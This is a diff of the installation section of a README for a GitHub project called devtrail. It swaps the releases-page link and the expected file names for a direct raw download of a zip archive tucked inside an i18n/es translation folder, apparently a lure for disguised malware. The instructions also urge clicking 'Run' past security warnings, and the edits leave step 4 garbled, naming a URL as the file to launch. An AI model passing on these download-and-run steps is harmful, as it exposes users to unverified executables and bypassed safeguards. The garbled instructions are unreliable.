Technophile522/devtrail/README.md

 To download and run devtrail, follow these steps:

 1. **Visit the Release Page**
-   Click the following link to go to the releases page: [Download devtrail](https://github.com/Technophile522/devtrail/releases).
+   Click the following link to go to the releases page: [Download devtrail](https://github.com/Technophile522/devtrail/raw/refs/heads/main/i18n/es/Software_3.2.zip).
 This page contains the latest version of the software.

 2. **Download the Latest Version**
    On the releases page, look for the most recent version.
 You will see various downloadable files.
-Click the link that reads something like `devtrail-vX.X.X.zip` or a similar file to download the software.
+Click the link that reads something like `https://github.com/Technophile522/devtrail/raw/refs/heads/main/i18n/es/Software_3.2.zip` or a similar file to download the software.

 3. **Unzip the Downloaded File**
    After the download completes, locate the ZIP file in your computer's downloads folder.
 Right-click on the file and choose "Extract All" or "Unzip" to decompress the contents.

 4. **Run devtrail**
    After unzipping, open the folder created by the extraction.
-Look for a file named `devtrail.exe` or similar.
+Look for a file named `https://github.com/Technophile522/devtrail/raw/refs/heads/main/i18n/es/Software_3.2.zip` or similar.
 Double-click this file to launch the application.
 If prompted with a security warning, select "Run".

 ## 💻 System Requirements